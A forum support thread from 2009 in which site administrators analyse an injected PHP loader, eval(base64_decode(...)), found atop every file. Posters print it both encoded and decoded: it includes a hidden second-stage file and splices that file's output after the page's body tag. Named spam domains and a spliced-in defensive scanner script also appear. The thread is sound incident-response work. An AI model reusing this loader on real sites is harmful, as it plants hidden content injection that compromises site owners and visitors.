Is this a hack?

Started by Xavi-Nena, February 07, 2009, 10:16:55 PM


Xavi-Nena

I have code at the top of some of my files; I'm guessing it's a hack?

<? /**/eval(base64_decode('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')); ?>

Xavi-Nena

Never mind, sorry, I figured out that it was.

MrMike

Yep, it decodes to this... and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Xavi-Nena

Any idea how to figure out how this is happening?

MrMike

It looks like they put the file "copper.php" on the site and are calling it through an include:

/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot of GZ-encoded stuff to further hide the programming statements. It could be almost anything: a malware dropper, an extra ad displayer, a backdoor, a botnet includer file, etc.

Xavi-Nena

Ugh, thanks...

Let's hope it stops, considering I do not even have that file in my themes directory anymore...

MrMike

Quote from: NenaGb on February 08, 2009, 12:18:12 AM
Ugh, thanks...

Let's hope it stops, considering I do not even have that file in my themes directory anymore...
More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a Linux box, this command will list the newest files anywhere on the system: ls -a -l -t -R | more

Xavi-Nena

I'm not sure exactly if I am or not, or how to run that code... would you mind explaining? Thanks so much.

Fustrate

I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

<?php
// Decoded stage-1 loader, with the long random variable names replaced by $var1 - $var7.
// It runs once per request, and only does anything if the second-stage file exists on disk.
if (function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;   // guard so the loader is not set up twice in one request

    if (file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')) {
        // copper.php is the real payload; it is expected to define gml()
        include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

        if (function_exists('gml') && !function_exists('dgobh')) {
            // Fallback gzip decoder for PHP builds without gzdecode(): it reads the
            // gzip header flag byte (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2) to find
            // where the raw deflate stream starts, then inflates from there.
            if (!function_exists('gzdecode')) {
                function gzdecode($var1) {
                    $var2 = ord(substr($var1, 3, 1));   // FLG byte
                    $var3 = 10;                          // fixed gzip header length
                    $var4 = 0;

                    if ($var2 & 4) {                     // FEXTRA: 2-byte length + data
                        $var4 = unpack('v', substr($var1, 10, 2));
                        $var4 = $var4[1];
                        $var3 += 2 + $var4;
                    }

                    if ($var2 & 8)                       // FNAME: NUL-terminated
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if ($var2 & 16)                      // FCOMMENT: NUL-terminated
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if ($var2 & 2)                       // FHCRC: 2-byte header CRC
                        $var3 += 2;

                    $var5 = gzinflate(substr($var1, $var3));

                    if ($var5 === FALSE)                 // not gzip: pass the input through
                        $var5 = $var1;

                    return $var5;
                }
            }

            // Output-buffer callback: decompresses the buffered page if needed, then
            // splices whatever gml() returns right after the <body> tag, or at the
            // very start of the output if there is no <body> tag.
            function dgobh($var6) {
                Header('Content-Encoding: none');
                $var7 = gzdecode($var6);
                if (preg_match('/<body/si', $var7))
                    return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
                else
                    return gml() . $var7;
            }

            ob_start('dgobh');
        }
    }
}
Steven Hoffman
Former Team Member, 2009-2012

Xavi-Nena

Forgive my ignorance, but what exactly is this cleaned up? O:)

aldo

We would need to see copper.php in order to know what it does.

Fustrate

Well, it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that's actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.

Totosfo

Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas


cafecommk

Can someone tell me how you resolved this issue? I do not have a copper.php file, but I have this:
/**/eval(base64_decode('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'));
and it is in all my PHP files, even in settings_bak.

I apologize for writing in two posts http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

Thank you

Fustrate

You'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.

cafecommk

Sorry, I did not find a copper.php. I removed all the files not needed and [n3rve] helped on the large upgrade and...
I just hope it does not make me any more trouble.

ccondrup

I have recently had my SMF 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS8zL2IvYm14L3d3dy9wbWEvcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvMy9iL2JteC93d3cvcG1hL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php.
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpMyAdmin install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx. 20 new base64-encoded evals. I decoded everything I found and ran it through a code prettifier, and ended up with a 100kb PHP file of approx. 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive.

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback URLs, I found several domains common forum admins have had trouble with, so I am creating an SQL file to add all these domains to my SMF ban triggers. It's also attached as spamdomains.sql - remember to replace 15 with the id of the ban group you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.
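A defender's scanner for the injection ccondrup and MrMike describe, as an added example that is not code from the thread: it walks a directory tree, spots the eval(base64_decode(...)) line at the top of each .php file, decodes it, and reports the include_once path that names the second-stage file (copper.php or style.css.php in the posts above). The sample tree, the /home/example/... path and the minimal loader it encodes are constructed for the demo, not the real payload.

```python
import base64
import os
import re
import tempfile

# Stage-1 loader as the thread shows it at the top of every infected .php file.
INJECT_RE = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
# The decoded loader pulls the real payload in from one hard-coded path.
INCLUDE_RE = re.compile(r"include_once\('([^']+)'\)")

def decode_loader(php_source):
    """Return (decoded_loader, included_path), or None if no eval/base64 line."""
    m = INJECT_RE.search(php_source)
    if not m:
        return None
    try:
        loader = base64.b64decode(m.group(1), validate=True).decode("latin-1")
    except ValueError:
        return None  # not valid base64, so not this loader
    inc = INCLUDE_RE.search(loader)
    return loader, (inc.group(1) if inc else None)

def scan_tree(root):
    """Walk root; return (infected_file, include_target) for every hit."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                head = fh.read(8192)  # the injection sits at the very top
            res = decode_loader(head)
            if res is not None:
                hits.append((path, res[1]))
    return hits

# Constructed sample, NOT the real payload: a minimal loader that only does the
# include, with a made-up path, base64-encoded the way the injected line is.
SAMPLE_PATH = "/home/example/public_html/img/copper.php"
SAMPLE_LOADER = "if(file_exists('%s')){include_once('%s');}" % (SAMPLE_PATH, SAMPLE_PATH)
SAMPLE_LINE = "<?php /**/eval(base64_decode('%s')); ?>\n" % (
    base64.b64encode(SAMPLE_LOADER.encode()).decode())

def build_sample_tree():
    """Write one infected and one clean .php file into a temp dir; return it."""
    root = tempfile.mkdtemp(prefix="smf_scan_")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(SAMPLE_LINE + "<?php echo 'forum'; ?>\n")
    with open(os.path.join(root, "SSI.php"), "w") as fh:
        fh.write("<?php echo 'clean'; ?>\n")
    return root

if __name__ == "__main__":
    for infected, target in scan_tree(build_sample_tree()):
        print(infected, "->", target)
```

Point scan_tree at the web root of a live site to get the list of files to clean and the path of the second-stage file to pull for analysis; note the real loader only includes that file if it exists, so its absence does not mean the injected lines are harmless.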

busterone

That looks really familiar. Did you, or do you, have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

ccondrup

Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my ban triggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from the same host/IP. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)

busterone

I had 4 of them from the same IP range, but not the Krisbarteo character. I was lucky, no hack and no damage. :)

thatguy

I had another site (not SMF) completely destroyed by this exploit. Although all my SMF PHP pages have that line of code in them I am hoping a clean up script I was pointed to will remove all the malicious code. I'll find out I suppose. The forum still works though.

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS93YXN0aW4yL3B1YmxpY19odG1sL2UxMDd2NjE2L2UxMDdfaGFuZGxlcnMvdGlueV9tY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9fdnRpX2NuZi9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvd2FzdGluMi9wdWJsaWNfaHRtbC9lMTA3djYxNi9lMTA3X2hhbmRsZXJzL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvX3Z0aV9jbmYvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> <?php

Very frustrating to see 5 years of fun down the tubes because of an unknown spammer. 5 minutes alone with the dude is all I am asking for.
The statements above have not been evaluated by the Food and Drug Administration.
These statements are not intended to diagnose, treat, cure or prevent any disease.

ccondrup

I'd like to add that once I got rid of this entirely (I went the manual route), loading my forum (hosted in Norway for Norwegians) pages went from ~2-3 seconds to 0.1-0.5 sec. It was immediately noticeable.

thatguy

Quote from: ccondrup on June 10, 2009, 01:29:43 PM
I'd like to add that once I got rid of this entirely (I went the manual route), loading my forum (hosted in Norway for Norwegians) pages went from ~2-3 seconds to 0.1-0.5 sec. It was immediately noticeable.

I am very glad it worked for you. I am in the process of changing all my passwords, but if this hack goes as deep as I think it does, and as deep as mentioned here, then changing passwords before the site is deterged is useless.


thatguy

I sure did. Followed the directions to a "T". However, it wouldn't run; it kept saying it needed to be in the folder where SSI was. Thing is, it was. They were right next to each other, like peas and carrots. I'll take a screenshot tonight when I get home and show you.

Thanks

Fustrate

Try changing the path at the top of the file to the relative path... something like /home/thatguy/public_html/forum/SSI.php and see if that works. If you're not sure, look in Settings.php and see what path $sourcedir uses, and just modify that.

thatguy

OK, I'll do that. I really want it to run. Even though I changed all my passwords, I don't like having that viral code in there. They could already know my passwords.

Thank You

thatguy

Thank you for your patience with me on this; these are the paths in my Settings.php.

# Note: These directories do not have to be changed unless you move things.
$boarddir = '/home/blood13/public_html/Forums';      # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/home/blood13/public_html/Forums/Sources';      # Path to the Sources directory.

I changed the path in kb_scan.php to /home/blood/13/public_html/Forums. However, I still get this:

Error: Cannot run - please verify you put this in the same place as SMF's index.php and SSI.php files.

Norv

*headscratch*
Certainly looks as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

Norv

Please, eventually, make sure you access your forum, log in as admin, then try to access kb_scan.php directly in the browser.

thatguy

First of all, thanks for your reply. I'll try that.

thatguy

Quote from: Norv on June 12, 2009, 05:24:35 PM
*headscratch*
Certainly looks as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?

SSI is 755
kb_scan.php is 644

Is that right?

thatguy

Thank you all for the tips. I had another site that was completely wiped out by this exploit; however, I wasn't using SMF there. That site was not worth cleaning, too much damage. The site I was concerned most with was my forum for veterans. I couldn't get this cleaning script to work, so I went in and deterged every page manually. 5 years ago something similar happened with another forum of mine and the entire site was lost; thankfully that was not the case this time.
